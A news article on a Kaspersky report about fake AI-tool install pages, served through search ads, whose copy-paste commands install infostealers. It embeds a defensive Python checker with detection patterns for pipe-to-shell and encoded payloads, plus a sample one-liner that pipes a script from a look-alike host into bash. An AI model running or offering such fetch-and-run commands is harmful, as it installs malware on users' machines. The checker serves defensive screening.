Fake AI tool ads spread malware
By Staff Writer

Cybercriminals are using fake ads and cloned websites that imitate legitimate AI tool installation pages to trick users into downloading malware, according to Kaspersky.
Sam Yan, head of sales for Asia Emerging Countries at Kaspersky, said the campaign is especially dangerous because it blends into how developers normally work.
“This campaign is particularly dangerous because it blends seamlessly into a developer’s normal workflow. Our researchers found that the fake pages are visually identical to official documentation and are being served through paid search advertisements so there is no obvious red flag. Developers who copy and execute the commands are simply doing what they would normally do, except the instructions deliver malware instead of the tool they were looking for. Developers typically have access to source code, corporate credentials, and sensitive systems, meaning a single infection can put entire organizations at risk,” Yan said.
The campaign targets users looking for popular AI developer tools such as Claude Code and OpenClaw.
Yan said these AI tools have become attractive targets because more developers and organizations now rely on them in daily work.
“The growing reliance on AI tools like Claude Code and OpenClaw is precisely what makes them attractive targets. As more developers and organizations integrate these tools into their daily workflows, cybercriminals see a larger and more valuable pool of potential victims. The more indispensable a tool becomes, the less likely users are to second-guess the installation process, and that trust is exactly what attackers are banking on,” Yan said.
Kaspersky said the attack may begin when users search for “Claude Code download,” click sponsored ads, and land on fake documentation hosted on Squarespace.
Users are then instructed to follow copy-paste commands that install malware instead of the AI tool they intended to download.
“As mentioned in our statement, Kaspersky discovers infostealers mimicking Claude Code, OpenClaw and other AI developer tools. Users search for “Claude Code download,” click sponsored ads, land on fake documentation hosted on Squarespace, follow copy-paste commands, and install malware (Amatera on Windows, AMOS on macOS) that steals sensitive data,” Yan said.
The malware can steal sensitive information, including login credentials, browser activity, and cryptocurrency wallet information.
Kaspersky said users should watch for installation pages reached through ads instead of official websites.
Yan said other red flags include commands copied from external sources without verification, documentation hosted on unfamiliar domains even if visually identical to legitimate pages, and instructions not linked directly from official project channels.
The threat is significant for freelancers, developers, startup teams, and remote workers in the Philippines, many of whom use AI tools but may not have dedicated cybersecurity support, Yan said.
“The risk is significant. Freelancers, developers, and startup teams in the Philippines are among the most active adopters of AI tools, and many of them work without dedicated security support. That makes them highly vulnerable. A single infection does not just compromise personal data. It can expose client source code, corporate credentials, and confidential project files. For someone whose entire business runs on their laptop and their accounts, that kind of breach can be devastating,” Yan said.
Yan said infected devices can expose more than personal accounts and passwords.
“Most people think of a hacked account as losing a password or having personal photos stolen. But for developers and employees using these tools, the stakes are much higher. When their device is infected, attackers can access the actual work stored on their computer, including the projects they are building, the login credentials they use to access their company’s systems, and the confidential files they handle every day. One infected device can become a doorway into an entire organization,” Yan said.
The threat shows that companies should treat AI tool adoption as a cybersecurity concern, not only as a productivity issue.
“Every time a new technology becomes widely adopted, cybercriminals follow. The threat is not new. It has simply moved to a new target. Attackers were already exploiting trusted platforms, search engines, and legitimate-looking websites long before AI tools became mainstream. What has changed is that AI tools are now popular enough to be worth targeting. Companies should not see this as a reason to slow down AI adoption but as a reminder to apply the same security awareness and vetting they would with any widely used technology. The right response is education and vigilance,” Yan said.
Yan said search engines, ad platforms, and hosting providers should also help prevent malicious pages from reaching users.
“They have the reach and the tools to detect and remove malicious content before it reaches users. The responsibility cannot fall on the user alone, especially when the attack is designed to look completely legitimate. Greater scrutiny of sponsored content and faster takedown processes would go a long way,” Yan said.
For Philippine businesses, especially small and medium enterprises without dedicated cybersecurity teams, Kaspersky recommended immediate safeguards to reduce the risk:
- Verify that download links come from official project websites.
- Review command-line instructions before running them.
- Avoid guides they do not fully understand or did not directly request.
- Use endpoint security tools that can detect infostealers.
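The first two safeguards above can be turned into a quick pre-execution check. The script below is an added illustration, not Kaspersky's tooling or any project's official installer: it extracts the URLs from a pasted install snippet, compares their hosts against an allowlist of official domains (a placeholder here; an organization would fill it from the project's official channels), and flags patterns that pipe downloaded content straight into a shell or hide it behind encoding. The sample commands and domains are constructed.

```python
"""Pre-execution review of a copy-pasted install command (added example)."""
import re
from urllib.parse import urlparse

# Assumption: domains the organization has verified as official for the tool.
OFFICIAL_DOMAINS = {"docs.example-official.com"}

URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# Patterns that hand downloaded content straight to an interpreter or obscure it.
RISKY_PATTERNS = {
    "pipe_to_shell": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "powershell_iex": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "encoded_payload": re.compile(r"base64\s+(-d|--decode)|-EncodedCommand|-enc\b", re.I),
}


def host_is_official(url: str) -> bool:
    """True only if the URL's host is an allowlisted domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def review_install_command(snippet: str) -> dict:
    """Return findings; safe_to_run is False if any URL is unofficial or a risky pattern appears."""
    urls = URL_RE.findall(snippet)
    unofficial = [u for u in urls if not host_is_official(u)]
    risky = [name for name, rx in RISKY_PATTERNS.items() if rx.search(snippet)]
    return {
        "urls": urls,
        "unofficial_urls": unofficial,
        "risky_patterns": risky,
        "safe_to_run": not unofficial and not risky,
    }


# Constructed samples: a one-liner from a look-alike docs page in the style the
# article describes, and a download from the (placeholder) official domain that
# saves the script for inspection instead of executing it.
SAMPLE_FAKE = "curl -fsSL https://lookalike-docs.example/install.sh | bash"
SAMPLE_OFFICIAL = "curl -fsSL https://docs.example-official.com/install.sh -o install.sh && less install.sh"

if __name__ == "__main__":
    for s in (SAMPLE_FAKE, SAMPLE_OFFICIAL):
        print(review_install_command(s))
```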
Yan said the most important habit for users is to verify installation links and command-line instructions before executing them, even if a page looks legitimate.
“Users must always verify installation links and command-line instructions from official sources before executing them, even if the page looks legitimate,” Yan said.